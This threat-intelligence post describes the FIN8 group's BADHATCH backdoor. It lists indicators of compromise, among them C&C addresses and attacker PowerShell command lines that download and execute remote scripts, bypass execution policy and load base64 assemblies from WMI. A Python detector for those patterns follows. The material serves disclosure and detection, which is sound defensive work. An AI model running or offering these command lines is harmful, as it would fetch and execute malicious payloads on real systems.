FIN8 Group Returns with New and Improved BADHATCH Toolkit


Saturday, March 13th, 2021

FIN8, a financially motivated threat actor, first emerged in January 2016. The group is known to have used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems.

The FIN8 group uses a fully featured backdoor called BADHATCH, first discovered in 2019. Researchers at Bitdefender have been closely monitoring the development of the BADHATCH backdoor since its discovery and have found that the newly deployed versions can ensure persistence, gather information about the victim’s network and allow lateral movement to infect more computers and locate more information worth stealing.

Since 2019, FIN8 has continually improved the malware’s capabilities, adding features such as screen capturing, proxy tunneling, fileless execution and more.

A signature move of the FIN8 group is the use of long breaks between campaigns to improve TTPs and increase their rate of success. Researchers have now discovered a series of improvements to their BADHATCH tool, which allow for improved persistence and data collection. A key improvement is the use of TLS encryption to conceal PowerShell commands and evade security monitoring.

Over the past year, researchers have identified that FIN8 has targeted victims in the United States, Canada, South Africa, Puerto Rico, Panama, and Italy, while targeting industries such as insurance, retail, technology, and chemicals.

IOCs

  • C&C
    • 192[.]52[.]167[.]199
    • 104[.]168[.]145[.]204
    • us-west[.]com
  • Servers for Distributing PowerShell Scripts
    • https://192-129-189-73[.]sslip[.]io/yo
    • https://192-129-189-73[.]sslip[.]io/80
    • https://198-46-140-52.sslip[.]io/xxx
    • 198[.]46[.]140[.]52
    • 192[.]129[.]189[.]73
  • BADHATCH Samples
  • Command Lines
    • powershell -nop -ep bypass -c C:\Windows\Temp\sh-tmp.ps1 sys
    • powershell.exe -nop -ep bypass -c c:\windows\temp\mim.ps1
    • 786c34ba841a259d0c8945503d0b6d89c46e9245
    • powershell.exe -nop -ep bypass -c c:\windows\temp\mimi.ps1
    • 786c34ba841a259d0c8945503d0b6d89c46e9245
    • powershell.exe -nop -ep bypass -c c:\windows\temp\m.ps1
    • f9eef8b27ff68f41a8eb0b8739370640
    • powershell.exe -nop -ep bypass -c c:\Windows\temp\mldr2.ps1
    • f9eef8b27ff68f41a8eb0b8739370640
    • powershell.exe -nop -ep bypass -c C:\Windows\Temp\sh.ps1 sys
    • powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient).DownloadString('https://192-129-189-73.sslip[.]io/80')
    • powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient).DownloadString('https://192-129-189-73.sslip[.]io/yo')
    • powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient).DownloadString('https://198-46-140-52.sslip[.]io/xxx')
    • powershell.exe -nop -c [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String(([WmiClass] 'root\cimv2:Win32_Base64Class').Properties['Prop'].Value));[utYEb.a6Kxxs]::Ye5d(10)
    • powershell.exe -nop -c [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String(([WmiClass] 'root\cimv2:Win32_Base64Class').Properties['Prop'].Value));[Inrcp6.ylN8K]::ATka(10)
    • powershell.exe -nop -c [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String(([WmiClass] 'root\cimv2:Win32_Base64Class').Properties['Prop'].Value));[m5cW.i6guL]::ZOoS(10)
  • BADHATCH Deployment Scripts

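As an added example (not code from the original post or from Bitdefender), a small Python detector that checks the CommandLine field of process-creation log lines against the three shapes seen in the command lines above: a .ps1 under \Windows\Temp run with -ep bypass, the iex/DownloadString cradle, and a .NET assembly decoded from base64 stored in a WMI class. The rule names, the Sysmon-style log layout and the sample lines are constructed assumptions.

```python
import re

# Heuristic rules mirroring the three command-line shapes listed above (tag names are our own).
RULES = [
    ("temp-script-exec-bypass",   # .ps1 under \Windows\Temp run with -ep bypass
     re.compile(r"powershell(?:\.exe)?\b.*-ep\s+bypass.*\\(?:windows\\)?temp\\\S+\.ps1", re.I)),
    ("download-cradle-iex",       # iex over a WebClient.DownloadString fetch
     re.compile(r"\biex\b.*New-Object\s+(?:System\.)?Net\.WebClient.*DownloadString\(", re.I)),
    ("wmi-class-assembly-load",   # .NET assembly decoded from a WMI class property
     re.compile(r"Reflection\.Assembly\]::Load\(.*FromBase64String\(.*\[WmiClass\]", re.I)),
]
# Wildcard-DNS hosts of the script servers in the IOC list above.
SSLIP_HOST = re.compile(r"https?://[\w.-]+\.sslip\.io\b", re.I)

def classify_command(cmd):
    """Return the rule tags a single command line triggers (empty list if none)."""
    # Defanged IOCs use "[.]" and curly quotes; normalise so the patterns still match.
    norm = cmd.replace("[.]", ".").replace("\u2018", "'").replace("\u2019", "'")
    tags = [tag for tag, rx in RULES if rx.search(norm)]
    if SSLIP_HOST.search(norm):
        tags.append("sslip-io-host")
    return tags

def scan_log(lines):
    """Return (line_no, command, tags) for every log line whose CommandLine field fires a rule."""
    field = re.compile(r"CommandLine:\s*(.*)$")
    hits = []
    for n, line in enumerate(lines, 1):
        m = field.search(line)
        if m:
            tags = classify_command(m.group(1))
            if tags:
                hits.append((n, m.group(1), tags))
    return hits

# Constructed sample lines in a Sysmon-style "CommandLine:" layout (not real telemetry).
SAMPLE_LOG = [
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine: powershell.exe -NoProfile -Command Get-Process",
    "Image: ... CommandLine: powershell -nop -ep bypass -c C:\\Windows\\Temp\\sh-tmp.ps1 sys",
    "Image: ... CommandLine: powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient).DownloadString('https://192-129-189-73.sslip.io/80')",
    "Image: ... CommandLine: powershell.exe -nop -c [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String(([WmiClass] 'root\\cimv2:Win32_Base64Class').Properties['Prop'].Value));[utYEb.a6Kxxs]::Ye5d(10)",
]

if __name__ == "__main__":
    for n, cmd, tags in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(tags)}")
```

The benign first line produces no tags; the other three each fire the rule for their shape, and the download cradle additionally flags the sslip.io host.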